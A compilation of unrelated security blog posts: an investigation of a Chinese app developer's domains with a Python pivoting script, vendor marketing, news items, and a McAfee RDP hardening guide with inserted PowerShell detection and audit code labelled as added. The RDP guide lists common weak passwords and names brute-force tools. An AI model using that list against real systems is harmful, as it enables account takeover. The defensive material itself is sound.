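        report[email] = {"domains": domains, "flagged": flagged}
    return report


def related_infrastructure(records, known_malware):
    """Domains not yet in threat intel that share a registrant with flagged ones."""
    related = set()
    for info in pivot_report(records, known_malware).values():
        if info["flagged"]:
            related.update(d for d in info["domains"] if d not in known_malware)
    return sorted(related)


if __name__ == "__main__":
    for domain in related_infrastructure(RECORDS, KNOWN_MALWARE):
        print(defang(domain), "shares a registrant with known malware domains")
```

The output is a watch list, not an attribution by itself: a shared registrant email is a lead that the post then corroborates with organization names and office addresses, which is why `orgs_for_domain` is kept alongside the email cluster.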

A records search at Domaintools for “Shanghai Blazefire Network Technology Co” returns 11 domains, including blazefire[.]net, which is registered to a yehuo@blazefire.net. For the remainder of this post, we’ll focus on the bolded domain names below:

Domain Name           Create Date   Registrar
2333youxi[.]com       2016-02-18    ALIBABA CLOUD COMPUTING (BEIJING) CO., LTD
52gzone[.]com         2012-11-26    ALIBABA CLOUD COMPUTING (BEIJING) CO., LTD
91gzonep[.]com        2012-11-26    ALIBABA CLOUD COMPUTING (BEIJING) CO., LTD
blazefire[.]com       2000-08-24    ALIBABA CLOUD COMPUTING (BEIJING) CO., LTD
blazefire[.]net       2010-11-22    ALIBABA CLOUD COMPUTING (BEIJING) CO., LTD
hsuheng[.]com         2015-03-09    GODADDY.COM, LLC
jyhxz.net             2013-07-02    —
longmen[.]com         1998-06-19    GODADDY.COM, LLC
longmenbiaoju[.]com   2012-12-09    ALIBABA CLOUD COMPUTING (BEIJING) CO., LTD
oppayment[.]com       2013-10-09    ALIBABA CLOUD COMPUTING (BEIJING) CO., LTD
tongjue[.]net         2014-01-20    ALIBABA CLOUD COMPUTING (BEIJING) CO., LTD

Following the breadcrumbs from some of the above domains we can see that “Blazefire” is a sprawling entity with multiple business units and names. For example, 2333youxi[.]com is the domain name for Shanghai Qianyou Network Technology Co., Ltd., a firm that says it is “dedicated to the development and operation of Internet mobile games.”

Like the domain blazefire[.]com, 2333youxi[.]com also was initially registered to tosaka1027@gmail.com and soon changed to Shanghai Blazefire as the owner.

The offices of Shanghai Quianyou Network — at Room 344, 6th Floor, Building 10, No. 196, Ouyang Rd, Shanghai, China — are just down the hall from Shanghai Wildfire Network Technology Co., Ltd., reportedly at Room 35, 6th Floor, Building 10, No. 196, Ouyang Rd, Shanghai.

The domain tongjue[.]net is the Web site for Shanghai Bronze Network Technology Co., Ltd., which appears to be either another name for or a sister company to Shanghai Tongjue Network Technology Co., Ltd.  According to its marketing literature, Shanghai Tongjue is situated one door down from the above-mentioned Shanghai Quianyou Network — at Room 36, 6th Floor, Building 10, No. 196, Ouyang Road.

“It has developed into a large domestic wireless Internet network application,” reads a help wanted ad published by Tongjue in 2016.  “The company is mainly engaged in mobile phone pre-installation business.”

That particular help wanted ad was for a “client software development” role at Tongjue. The ad said the ideal candidate for the position would have experience with “Windows Trojan, Virus or Game Plug-ins.” Among the responsibilities for this position were:

- Crack the restrictions imposed by the manufacturer on the mobile phone.
- Research and master the android [operating] system
- Reverse the root software to study the root of the android mobile phone
- Research the anti-brushing and provide anti-reverse brushing scheme

WHO IS BLAZEFIRE/YEHUO?

Many of the domains mentioned above have somewhere in their registration history the name “Hsu Heng” and the email address yehuo@blazefire.net. Based on an analysis via cyber intelligence firm 4iq.com of passwords and email addresses exposed in multiple data breaches in years past, the head of Blazefire goes by the nickname “Hagen” or “Haagen” and uses the email “chuda@blazefire.net“.

Searching on the phrase “chuda” in Mandarin turns up a 2016 story at the Chinese gaming industry news site Youxiguancha.com that features numerous photos of Blazefire employees and their offices. That story also refers to the co-founder and CEO of Blazefire variously as “Chuda” and “Chu da”.

“Wildfire CEO Chuda is a tear-resistant boss with both sports (Barcelona hardcore fans) and literary genre (playing a good guitar),” the story gushes. “With the performance of leading the wildfire team and the wildfire product line in 2015, Chu has won the top ten new CEO awards from the first Black Rock Award of the Hardcore Alliance.”

Interestingly, the registrant name “Chu Da” shows up in the historical domain name records for longmen[.]com, perhaps Shanghai Wildfire’s oldest and most successful mobile game ever. That record, from April 2015, lists Chu Da’s email address as yehuo@blazefire.com.

The CEO of Wildfire/Blazefire, referred to only as “Chuda” or “Hagen.”

It’s not clear if Chuda is all or part of the CEO’s real name, or just a nickname; the vice president of the company lists their name simply as “Hua Wei,” which could be a real name or a pseudonymous nod to the embattled Chinese telecom giant by the same name.

According to this cached document from Chinese business lookup service TianYanCha.com, Chuda also is a senior executive at six other companies.

Google declined to elaborate on its blog post. Shanghai Wildfire did not respond to multiple requests for comment.

It’s perhaps worth noting that while Google may be wise to what’s cooking over at Shanghai Blazefire/Wildfire Network Technology Co., Apple still has several of the company’s apps available for download from the iTunes store, as well as others from Shanghai Qianyou Network Technology.

Endpoint’s Role in Enterprise Data Protection

Data is a big deal. As the foundation of a modern-day business, data drives organizations’ everyday operations. It provides insights, indicates trends, and informs business decisions. This means securing an organization’s data is of the utmost importance, especially when it comes to defending against attacks emerging out of today’s threat landscape. And though there are standards that have been published to protect customer data and data context, these rules are still incomplete and imperfect, given any published best practice that works for organizations may also create immediate targets for an attacker to bypass. Let’s examine some key threats that compromise enterprise data, and the role endpoint security plays in safeguarding that information.

Means to an End

For many cybercriminals, data is the end goal and endpoint devices are the avenue for getting there. Whether it’s through a compromised app, credential theft, malware, ransomware, or a phishing attack – cyberattacks are consistently testing enterprises in an attempt to find a weakness. That’s because the endpoint acts as the ultimate gateway to critical enterprise data. If compromised, it could cause ripple effects on an organization’s day-to-day functions, causing downtime or a longer attack dwell time, permitting cybercriminals to harvest more sensitive data.

The good news? Doors work both ways. Just as endpoints can create gateways to important data, they can also stop cybercrime in its tracks, if properly secured.

Keeping the Door Locked

The best option for safeguarding your data is securing it at the start – the endpoint. By implementing agile and adaptive endpoint security on every device in your organization, enterprises can ensure data stays locked down. The key is leveraging endpoint solutions that go beyond traditional deterministic security features like anti-malware and include predictive technology like artificial intelligence (AI) and machine learning (ML). This type of technology can quickly sift through security incidents in order to identify the real threats posed to endpoint devices, which helps security teams reduce the time required to address threats. Security teams should also ensure they leverage endpoint security solutions that provide increased, centralized visibility into all of their organization’s devices. This kind of visibility is crucial not only for rapid detection, but also to ensure user behavior is being tracked and policies are being enforced.

Security teams aiming to stop modern-day cyberthreats at the start should adopt security solutions such as McAfee MVISION Mobile and McAfee MVISION Endpoint, which have machine learning algorithms and analysis built into their architecture to help identify malicious behavior and attack patterns affecting endpoint devices. To add to that, teams should also leverage solutions such as McAfee DLP Endpoint, which empowers IT staff with increased visibility, giving them knowledge of what their users are doing at all times. With this kind of technology in play, enterprise data won’t be anyone else’s business other than the organization it belongs to.

To learn more about effective endpoint security strategy, be sure to follow us @McAfee and @McAfee_Business.

The post Endpoint’s Role in Enterprise Data Protection appeared first on McAfee Blogs.

US-Iran Cyberwar Heats Up

President Trump has authorized a round of cyber attacks against Iran, and U.S. companies and agencies are bracing for counter attacks.

The Washington Post reported that the U.S. cyberattack had disabled Iranian missile control systems. The attack was the latest in escalating tensions between the two countries, which includes the recent downing of an unmanned surveillance drone. 

“This operation imposes costs on the growing Iranian cyberthreat, but also serves to defend the United States Navy and shipping operations in the Strait of Hormuz,” said former senior White House cybersecurity official Thomas Bossert.

The Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) issued an alert warning organizations of potential retaliation from Iranian hackers, including the deployment of “wiper” malware that deletes data from targeted computers and networks.

“Iranian regime actors and proxies are increasingly using destructive ‘wiper’ attacks, looking to do much more than just steal data and money,” said CISA director Christopher Krebs.

Cyber warfare is in addition to what the U.S. government has called “kinetic” actions, i.e. more traditional military operations. Earlier this month, the U.S. Cyber Command reportedly deployed offensive malware against Russia’s electrical grid.

The post US-Iran Cyberwar Heats Up appeared first on Adam Levin.

Veracode to showcase DevSecOps solutions at inaugural AWS re:Inforce

Developers and security professionals from around the world are descending on Boston this week to attend the first AWS security conference, re:Inforce, for what promises to be one of the most exciting events in recent memory in the industry.

As a pioneer of application security that is helping educate both security and dev teams in building more secure code, Veracode is proud to be a platinum sponsor of AWS re:Inforce here in Boston, a world renowned hub of cybersecurity innovation.

With so many security conferences taking place throughout the year around the world, and with more companies entering the market and crowding niches, it can have a dizzying effect for companies buying security solutions.

What makes AWS re:Inforce different?

Companies seeking to change the world are using software to push entire industries forward with new advancements, better insights and greater efficiencies. At the same time, new threat vectors appear, and new languages and frameworks change how we create software, causing cyberattacks to evolve and become more sophisticated. The security of software is just as critical as the function of the software itself. But, if the software you are developing or buying is insecure, you can’t achieve your vision – no matter how important or innovative it is.

Two movements that are allowing innovation and security to evolve in harmony – the shift to cloud-native solutions and the evolution of DevSecOps – will be on full display at AWS re:Inforce. That’s because we’ve moved from a world where applications were only run in the cloud to one where they are written and live in the cloud throughout their lifecycle. As a result, we are experiencing a dramatic increase in scan frequency and our customers are adopting application security practices earlier in their continuous integration pipeline. More frequent, incremental scans in the SDLC – a pillar of DevSecOps – allow companies to fix flaws more than 11 times more quickly than the typical organization. Fundamentally, when a company’s applications are more secure and their development teams are not slowed down by security, they achieve a competitive advantage.

Veracode is evolving its SaaS architecture by leveraging the power of AWS to better meet increased demand for DevSecOps practices from customers. Development teams are looking for fast, accurate application security tools integrated directly into their CI/CD work cycles. Veracode processes an average of more than 400,000 scans per month for customers around the world, and companies expect fast scan times and the ability to rapidly scale their volume of scanning given that developers scan at every code check-in. Veracode’s combination of technology, expertise, and services backed by AWS cloud services helps organizations more effectively find and fix the vulnerabilities in their software.

Veracode has also achieved Advanced Technology Partner Status in the AWS Partner Network (APN). This achievement is the highest tier within the AWS Partner Network. It recognizes a rigorous qualification process that includes AWS technical certification and validation with a wide range of customer references. The technical certification included an extensive review of the Veracode architecture leveraging AWS services against AWS published best practices and benchmarks for security, scalability and availability.

At AWS re:Inforce, attendees can visit the Veracode booth (#813) to learn more about the company’s application security testing platform, get a Veracode t-shirt and participate in an interactive experience designed to test developers’ secure programming knowledge.

On the evening of Tuesday, June 25, Veracode is hosting a “Conquer the Cloud” afterparty at City Tap House in Boston. Securing the cloud takes a tribe of AppSec heroes, and we’d love your tribe to meet ours over beers, games, and live music during AWS re:Inforce. Take a moment to register here.

Finally, don’t miss a presentation at re:Inforce by John Maski, Veracode Application Security Consultant and former director of DevSecOps at AT&T, titled “Integrating AppSec Into Your DevSecOps on AWS.” John will describe securing CI/CD pipelines in enterprise environments and “shifting left” with security. This talk is taking place at 10:15 am, Wed., June 26 in the Solutions Theater.

Streaming Safer Means Streaming Legally

It’s been more than a decade since Netflix launched its on-demand online streaming service, drastically changing the way we consume media. In 2019, streaming accounts for an astonishing 58 percent of all internet traffic, with Netflix alone claiming a 15 percent share of that use. But as streaming has become more common, so has the exploitation of streaming technologies. Some consumers stream illegally to cut costs, perceiving it to be a victimless crime. But as the saying goes: there’s no such thing as a free lunch. Streaming is no exception.

Jailbreak!

By downloading illegal streaming apps from third-party sources (i.e. outside of the Apple® App Store or Google™ Play), users may think they’re capitalizing on a clever loophole to access free services. However, according to a startling study conducted by Digital Citizens, 44 percent of households using pirated streaming services experienced a cybersecurity breach of one or more of their devices. That means if you use any type of illegal streaming device or app, you are six times more likely to fall victim to a cybersecurity attack than households using legal streaming services. Since a reported 12 million homes (in North America alone) are actively using pirated streams, that means illegal streaming may have led to up to 5 million potentially undetected breaches.

Why are illegal streams so attractive to cybercriminals? Because you’re probably streaming using devices and applications that are connected to your home network. Unfortunately, the firewall on the average home router does not provide adequate security against attacks. Any malware introduced by the streaming software is likely able to get through successfully. If you’re using a Windows® computer or device, that means the malware can infiltrate not only the device you’re actively using, but also any other Windows devices using the same internet connection. By spreading itself across multiple devices, malware makes its own removal that much more difficult. Paired with the fact that illegal streaming users are less likely to report a malicious app, this makes illegal streams a haven for cybercriminals in which they can easily attack users, infect their machines, steal their data, and hold their files for ransom.

Cybersecurity breaches caused by illegal streaming can manifest in many ways. For example, a popular illegal movie and live sports streaming app was observed scraping the connected WiFi name and password, as well as other sensitive information, according to ThreatPost.

How You Can Stream Safer

Ultimately, nobody can guarantee the security of an illegal stream. The truth is that legal streaming is the only safer streaming. That doesn’t mean you have to go through the giants, like Netflix or Hulu. Users can now access many low-cost, legal streaming options—including a few that are ad-supported and are actually free. So why put yourself and your family at risk for the sake of an illegal stream?

If you’re worried that someone with access to your WiFi network may be streaming illegally, thereby putting you and your devices in danger, make sure all of your devices are using up-to-date antivirus software to help stop cyberattacks and prevent malware infections. More importantly, talk with your family and friends about the real cost of “free” streaming. They’ll be more cautious once they fully understand the risks.


Looking for more home security education? Check out our Home + Mobile playlist on YouTube.


The post Streaming Safer Means Streaming Legally appeared first on Webroot Blog.

BH Consulting in the media: supply chain security still a concern

The Huawei controversy has raised fundamental questions around supply chain security, Brian Honan has told Infosecurity Magazine. In a video interview recorded at Infosecurity Europe 2019 conference in London, BH Consulting’s CEO said the issue of technology containing alleged backdoors to enable spying has led to “interesting conversations” in the security community.

The question boils down to whether it’s possible to build secure systems if there’s no trust in the technology platform they’re built upon, Brian said. “Unless we actually build something ourselves from absolute scratch, we are relying on third parties, and how much trust can we give to those third parties? So the bigger issue becomes: how you secure your supply chain?”

For security professionals, securing their company’s supply chain needs a more rigorous due diligence process than asking vendors whether they have antivirus software on their PCs. It’s about “asking the right questions into the right levels, and digging deep into the technology, depending on what your requirements are,” Brian said.

Huawei to the danger zone

Noting the accusations that Huawei technology has security bugs, Brian said that the same is true of products from many other places including the US, UK or Europe. “There’s no such thing as 100% secure systems. Take the Intel chips that we have in all our servers: they have security bugs in them,” he said.

Emphasising that he wasn’t trying to defend Huawei, Brian said: “A lot of what we’re reading in the press and the media, there’s nothing to substantiate the claims behind it.” The larger question about whether any bugs are accidental, or deliberately placed backdoors that allow Government-level spying, is “outside the remit of our industry,” he said.

The chain

Even if a security professional decided not to use a certain brand of equipment in their network, there’s a question of what happens when their information travels elsewhere within their company’s external supply chain, or through its internet service provider. Instead, infosec professionals should focus on protecting information at rest or in transit, since the early internet engineers designed it to share information, not keep it secret. “We have been trying to build security on top of a very unsafe foundation. We need to look at ways of how we keep our data safe, no matter where it goes or how far it travels,” Brian said.

As for what’s next in security, Brian said regulations will stay at the forefront over the next year. “GDPR isn’t over. GDPR is the evolution of data protection laws that we had already… the regulations are still being enforced. We still have to continue looking after GDPR.”  Some of the earliest court cases relating to GDPR are due to conclude soon, with potentially large fines for offenders. He also said Brexit is “the elephant in the room”, given how it could affect the way that European companies deal with UK businesses, and vice versa.

Toys in the attic

The ePrivacy Regulation (ePR) will have a huge say in how companies embed cookies on their websites and how they communicate and market to customers. Regulations like the EU Cybersecurity Act look set to impose rules on IoT or ‘smart’ devices. Their security – or lack of it – has long been a thorny issue. Brian recently commented on this issue in an article for the Irish Times about smart toys and we’ve also blogged about it before on Security Watch.

Summing up the likely short-term developments in security, Brian said: “A lot of things in the next 12-24 months are going to have a big impact on our industry, and it’s where the regulators are going to play catch-up on the technology. It’s going to be interesting to see how those two worlds collide.” You can watch the 15-minute video here (free, but sign-in required).

Panel discussion at Infosecurity Europe 2019. From left: Peter Brown, Group Manager Technology Policy, UK ICO; Steve Wright, GDPR & CISO Advisor, Bank of England; Titta Tajwe, CISO, News UK; Deborah Haworth, Penguin Random House UK; and panel moderator Brian Honan, CEO of BH Consulting

Regulate

Also during Infosecurity Europe, Brian moderated a debate on dealing with complex regulations while ensuring privacy, security and compliance. It featured data protection and security practitioners from the Bank of England, Penguin Random House UK, News UK and the UK Information Commissioner’s Office. Bank Info Security has a good writeup of some of the talking points. Its report noted that Brian focused the discussion on the broader regulatory landscape, including the updated EU ePrivacy Directive, while panellists and audience questions kept returning to GDPR.

The article noted how the panelists broadly agreed that regulations, including GDPR, helped to improve their organisation’s security posture. It quoted Titta Tajwe, CISO of News UK, who said: “With the EU GDPR, it really helped for executives to understand what needs to happen to protect the data of your customers. So it did allow the CISOs to get the budget they needed to do the work they’d already been asking for, for a long, long time.”

Photos used with kind permission of Mathew Schwartz.

The post BH Consulting in the media: supply chain security still a concern appeared first on BH Consulting.

RDP Security Explained

RDP on the Radar

Recently, McAfee released a blog related to the wormable RDP vulnerability referred to as CVE-2019-0708 or “Bluekeep.” The blog highlights a particular vulnerability in RDP which was deemed critical by Microsoft because it is exploitable over a network connection without authentication. These attributes make it particularly ‘wormable’ – it can easily be coded to spread itself by reaching out to other accessible networked hosts, similar to the famous EternalBlue exploit of 2017. This seems particularly relevant when (at the time of writing) 3,865,098 instances of port 3389 are showing as open on Shodan.

Prior to this, RDP was already on our radar. Last July, McAfee ATR did a deep dive on Remote Desktop Protocol (RDP) marketplaces and described the sheer ease with which cybercriminals can obtain access to a large variety of computer systems, some of which are very sensitive. One of the methods of RDP misuse that we discussed was how it could aid deploying a targeted ransomware campaign. At that time one of the most prolific targeted ransomware groups was SamSam. To gain an initial foothold on its victims’ networks, SamSam would often rely on weakly protected RDP access. From its RDP launchpad, it would proceed to move laterally through a victim’s network, successfully exploiting and discovering additional weaknesses, for instance in a company’s Active Directory (AD).

In November 2018, the FBI and the Justice department indicted two Iranian men for developing and spreading the SamSam ransomware extorting hospitals, municipalities and public institutions, causing over $30 million in losses. Unfortunately, this did not stop other cybercriminals from using similar tactics, techniques and procedures (TTPs).

The sheer number of vulnerable systems in the wild makes it a “target” rich environment for cybercriminals.

In the beginning of 2019 we dedicated several blogs to the Ryuk ransomware family that has been using RDP as an initial entry vector. Even though RDP misuse has been around for many years, it does seem to have gained an increased popularity amongst criminals focused on targeted ransomware.

Recent statistics showed that RDP is the most dominant attack vector, being used in 63.5% of disclosed targeted ransomware campaigns in Q1 of 2019.

Source: Coveware Q1 statistics

Securing RDP

Given the dire circumstances highlighted above it is wise to question if externally accessible RDP is an absolute necessity for any organization. It is also wise to consider how to better secure RDP if you are absolutely reliant on it. The good news is there are several easy steps that help an organization to better secure RDP access.

That is why, in this blog, we will use the adversarial knowledge from the McAfee ATR red team to explain what easy measures can be undertaken to harden RDP access.

Recommendations are additional to standard systems hygiene which should be carried out for all systems (although it becomes more important for Internet connected hosts), such as keeping all software up-to-date, and we intentionally avoid ‘security through obscurity’ items such as changing the RDP port number.

Do not allow RDP connections over the open Internet

To be very clear… RDP should never be open to the Internet. The internet is continuously being scanned for open port 3389 (the default RDP port). Even with a complex password policy and multi-factor authentication you can be vulnerable to denial of service and user account lockout. A much safer alternative is to use a Virtual Private Network (VPN). A VPN will allow a remote user to securely access their corporate network without exposing their computer to the entire Internet. The connection is mutually encrypted, providing authentication for both client and server, preferably using a dual factor, while creating a secure tunnel to the corporate network. As you only have access to the network you will still need to RDP to the computer but can do so more securely without exposing it to the internet.

Use Complex Passwords

An often-used alternative acronym for RDP is “Really Dumb Passwords.” That short phrase encapsulates the number one vulnerability of RDP systems: attackers simply scan the internet for systems that accept RDP connections and launch a brute-force attack with popular tools such as ForcerX, NLBrute, Hydra or RDP Forcer to gain access.

Using complex passwords will make brute-force RDP attacks harder to succeed.

Below are the top 15 passwords used on vulnerable RDP systems. We built this list based on information on weak passwords shared by a friendly Law Enforcement Agency from taken down RDP shops. What is most shocking is that such a large number of vulnerable RDP systems did not even have a password.

The TOP 15 used passwords on vulnerable RDP systems

[no password]
123456
P@ssw0rd
123
Password1
1234
password
1
12345
Password123
admin
test
test123
Welcome1
scan

Use Multi-Factor Authentication

In addition to a complex password, it is best practice to use multi-factor authentication. Even with great care and diligence, a username and password can still be compromised. If legitimate credentials have been compromised, multi-factor authentication adds an additional layer of protection by requiring the user to provide a security token, e.g. a code received by notification or a biometric verification. Better yet, a FIDO based authentication device can provide an extra factor which, unlike other one-time-password (OTP) mechanisms, is not vulnerable to spoofing attacks. This increases the difficulty for an unauthorized person to gain access to the computing device.

Use an RDP Gateway

Recent versions of Windows Server provide an RDP gateway server. This provides one external interface to many internal RDP endpoints, thus simplifying management, including many of the items outlined in the following recommendations. These include logging, TLS certificates, authentication to the end device without actually exposing it to the Internet, authorization to internal hosts, user restrictions, etc.

Microsoft provides detailed instructions for configuration of a remote desktop gateway server, for Windows Server 2008 R2 as an example, here.

Lock out users and block or timeout IPs that have too many failed logon attempts

A high number of failed logon attempts is a strong indication of a brute force attack. Limiting the number of logon attempts per user can prevent such attacks. A failed logon attempt is logged under Windows Event ID 4625. An RDP logon falls under logon type 10, RemoteInteractive. The account lockout threshold can be specified in the local group policy under security settings: Account Policies.

For logging purposes, it is best to log both failed and successful logons. Additionally, it is important to note that “specific security layer for RDP connections” needs to be enabled. Otherwise, you will be unable to tell whether the logon attempt came over RDP or see the source IP address. A comparison is shown below.

Event log, network logon (type 3): note that no source network address is present

Event log, RDP logon (type 10): note that the source network address is present
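The detection logic from the lockout recommendation above, as an added example that is not code from the McAfee post: it reads Event ID 4625 from the local Security log, keeps only logon type 10 (RemoteInteractive) failures, and groups them by source address. The function name, the 24-hour window, the threshold of 20 and the firewall rule naming are assumptions; the event ID, logon type and registry-free cmdlets are standard Windows.

```powershell
# Added example, not code from the McAfee post: find source addresses behind
# repeated failed RDP logons. Reads the local Security log, so run it elevated.
function Get-RdpBruteForceSources {
    [CmdletBinding()]
    param(
        [int]$Hours     = 24,   # look-back window (assumed value)
        [int]$Threshold = 20    # failures from one address treated as suspicious (assumed value)
    )

    $filter = @{
        LogName   = 'Security'
        Id        = 4625                            # "An account failed to log on"
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    # Get-WinEvent throws when nothing matches; treat that as "nothing to report".
    try   { $events = @(Get-WinEvent -FilterHashtable $filter -ErrorAction Stop) }
    catch { return }

    $failures = foreach ($e in $events) {
        # The structured EventData fields are only reachable through the event XML.
        $xml  = [xml]$e.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

        # LogonType 10 = RemoteInteractive, i.e. an RDP session. Without the
        # "specific security layer" setting, RDP failures show up as type 3
        # with no source address and cannot be attributed this way.
        if ($data['LogonType'] -eq '10') {
            [pscustomobject]@{
                Time     = $e.TimeCreated
                User     = $data['TargetUserName']
                SourceIp = $data['IpAddress']
                Status   = $data['Status']           # 0xC000006D = bad user name or password
            }
        }
    }

    $failures |
        Where-Object { $_.SourceIp -and $_.SourceIp -ne '-' } |
        Group-Object SourceIp |
        Where-Object { $_.Count -ge $Threshold } |
        ForEach-Object {
            $sorted = $_.Group | Sort-Object Time
            [pscustomobject]@{
                SourceIp      = $_.Name
                Failures      = $_.Count
                DistinctUsers = @($_.Group.User | Sort-Object -Unique).Count  # many users = spraying
                FirstSeen     = $sorted[0].Time
                LastSeen      = $sorted[-1].Time
            }
        } |
        Sort-Object Failures -Descending
}

# Usage: report, then block each offending address on the RDP port with a
# Windows Firewall rule (the rule name is an assumed convention).
$suspects = Get-RdpBruteForceSources -Hours 24 -Threshold 20
$suspects | Format-Table -AutoSize
foreach ($s in $suspects) {
    New-NetFirewallRule -DisplayName "Block RDP brute force from $($s.SourceIp)" `
        -Direction Inbound -Action Block -Protocol TCP -LocalPort 3389 `
        -RemoteAddress $s.SourceIp | Out-Null
}
```

A high DistinctUsers count for one address indicates password spraying rather than a single account under attack; per-user lockout alone will not stop that, which is why the source address is blocked as well.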

Use a Firewall to restrict access

Firewall rules can be created to restrict Remote Desktop access so that only a specific IP address or a range of IP addresses can access a given device. This can be achieved by simply opening “Windows Firewall with Advanced Security,” clicking on Inbound Rules and scrolling down to the RDP rule. A screen shot can be seen below.

Firewall settings for inbound RDP connections 

Enable Restricted Admin Mode

When connecting to a remote machine via RDP, credentials are stored on that machine and may be retrievable by other users of the system (e.g. malicious attackers). Microsoft has added restricted admin mode, which instructs the RDP server not to store the credentials of users who log in. Behind the scenes, the server now uses ‘network’ login rather than ‘interactive’ and therefore uses hashes or Kerberos tickets rather than passwords for authentication. An assessment of the pros and cons of this option is recommended before enabling it in your environment. On the negative side, the use of network login exposes the possibility of credential reuse (pass the hash) attacks against the RDP server. Pass the hash is likely possible anyway, internally, via other exposed ports, so this may not significantly increase exposure there; but when enabling this option on Internet-facing servers, where other ports are likely (and should be!) restricted, pass the hash is then extended to the Internet. Given the pros and cons, avoiding internal escalation of privilege is often prioritized and therefore restricted admin mode is enabled.

Microsoft TechNet describes configuration and usage of restricted mode here.

Encryption

There are four levels of encryption supported by standard RDP: Low, Client Compatible, High, and FIPS Compliant. This is configured on the Remote Desktop server. This can be further improved upon by using Enhanced RDP Security. When Enhanced RDP security is used, encryption and server authentication are implemented by external security protocols, e.g. TLS or CredSSP. One of the key benefits of Enhanced RDP Security is that it enables the use of Network Level Authentication (NLA) when using CredSSP as the external security protocol.

Certificate management is always a complexity, but Microsoft does provide this through the use of Active Directory Certificate Services (ADCS). Certificates can be pushed using Group Policy Objects (GPO) where this is available. Incompatible operating system environments must import certificates via the web interface exposed at https://<server>/Certsrv.

Enable Network Level Authentication (NLA)

To reduce the amount of initially required server resources, and thereby mitigate against denial of service attacks, network level authentication (NLA) can be used. Within this mode, strong authentication takes place before the remote desktop connection is established, using the Credential Security Support Provider (CredSSP) either through TLS or Kerberos. NLA can also help to protect against man-in-the-middle attacks, where credentials are intercepted. However, be aware that NLA over NTLM does not provide strong authentication and should be disabled in favor of NLA over TLS (with valid certificates).

Microsoft TechNet describes configuration and usage of NLA in Windows Server 2008 R2 here.

Interestingly, BlueKeep, mentioned above, is partially mitigated by having NLA enabled. As reported by Microsoft in the associated advisory “With NLA turned on, an attacker would first need to authenticate to Remote Desktop Services using a valid account on the target system before the attacker could exploit the vulnerability.”
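The settings covered in the Restricted Admin, Encryption and NLA sections above, checked on the local host as an added example (not code from the McAfee post): the registry value names and paths are Microsoft's own, the function names, the pass/fail thresholds and the group-size limit are assumptions, and the firewall display group name applies to English-language Windows.

```powershell
# Added example, not code from the McAfee post: audit the local host against the
# RDP settings discussed above (NLA, TLS security layer, encryption level,
# Restricted Admin mode, firewall scope, group membership). Run elevated.
function Test-RdpHardening {
    # Group Policy values, when set, take precedence over the per-listener values.
    $policy   = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services'
    $listener = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'
    $lsa      = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'

    # Returns $null instead of throwing when the key or value is absent.
    function Get-RegValue([string]$Path, [string]$Name) {
        try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name } catch { $null }
    }
    # Effective RDP listener setting: policy value if present, else the listener value.
    function Get-RdpSetting([string]$Name) {
        $v = Get-RegValue $policy $Name
        if ($null -eq $v) { $v = Get-RegValue $listener $Name }
        $v
    }
    function New-Check([string]$Check, $Value, [bool]$Pass, [string]$Note) {
        [pscustomobject]@{ Check = $Check; Value = $Value; Pass = $Pass; Note = $Note }
    }

    $nla = Get-RdpSetting 'UserAuthentication'
    New-Check 'Network Level Authentication' $nla ($nla -eq 1) '1 = NLA required (partial BlueKeep mitigation)'

    $layer = Get-RdpSetting 'SecurityLayer'
    New-Check 'Security layer' $layer ($layer -eq 2) '2 = TLS; 0 = legacy RDP security layer, 1 = negotiate'

    $enc = Get-RdpSetting 'MinEncryptionLevel'
    New-Check 'Minimum encryption level' $enc ($enc -ge 3) '1 = Low, 2 = Client Compatible, 3 = High, 4 = FIPS'

    $dra = Get-RegValue $lsa 'DisableRestrictedAdmin'
    New-Check 'Restricted Admin mode' $dra ($dra -eq 0) 'DisableRestrictedAdmin = 0 enables it; absent or 1 disables it'

    # An inbound RDP rule whose remote scope is "Any" exposes 3389 to every network.
    $rules = Get-NetFirewallRule -DisplayGroup 'Remote Desktop' -Direction Inbound -Enabled True -ErrorAction SilentlyContinue
    foreach ($r in $rules) {
        $remote = ($r | Get-NetFirewallAddressFilter).RemoteAddress -join ','
        New-Check "Firewall scope: $($r.DisplayName)" $remote ($remote -ne 'Any') 'Limit RemoteAddress to VPN or management ranges'
    }

    # The post asks for both of these groups to be as small as possible.
    $rdpUsers = @(Get-LocalGroupMember -Group 'Remote Desktop Users' -ErrorAction SilentlyContinue)
    New-Check 'Remote Desktop Users' ($rdpUsers.Name -join ',') ($rdpUsers.Count -le 5) 'Only accounts that need RDP (limit of 5 is an assumed value)'

    $localAdmins = @(Get-LocalGroupMember -Group 'Administrators' -ErrorAction SilentlyContinue |
        Where-Object { $_.ObjectClass -eq 'User' -and $_.PrincipalSource -eq 'Local' })
    New-Check 'Local administrator accounts' ($localAdmins.Name -join ',') ($localAdmins.Count -le 1) 'At most one, with a unique password (LAPS)'
}

Test-RdpHardening | Format-Table Check, Value, Pass, Note -AutoSize -Wrap
```

A failed 'Security layer' or 'Network Level Authentication' check on an Internet-facing host is the case the BlueKeep advisory quoted above is about: without NLA the vulnerable code path is reachable before any credential is presented.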

Restrict users who can logon using RDP

All administrators can use RDP by default. Remote access should be limited to only the accounts that require it. If all administrators do not need remote access you should consider removing the Administrator account from the RDP access group. You can then add the specific users which require access to the “Remote Desktop Users” group. See here for more information on managing users in your RDS collection.

Minimize the Number of Local Administrator Accounts

Local administrator accounts provide an attack vector for attackers who gain access to a system. Credentials can be cracked offline, and more accounts mean a greater likelihood of a successful crack. Therefore, you should aim for a maximum of one local administrator account which is secured appropriately.

Ensure that Local Administrator Accounts are Unique

If the local administrator accounts match those assigned to their counterparts on other systems within the server’s internal network, the attacker can potentially re-use credentials to move laterally. This issue occurs quite frequently, so Microsoft provided Local Administrator Password Solution (LAPS) as a means to avoid this scenario across the organization with central management of unique local administrator credentials. This is particularly relevant for externally exposed systems.

Microsoft provides a download and usage information for LAPS here.

Limit Domain Administrator Account Access

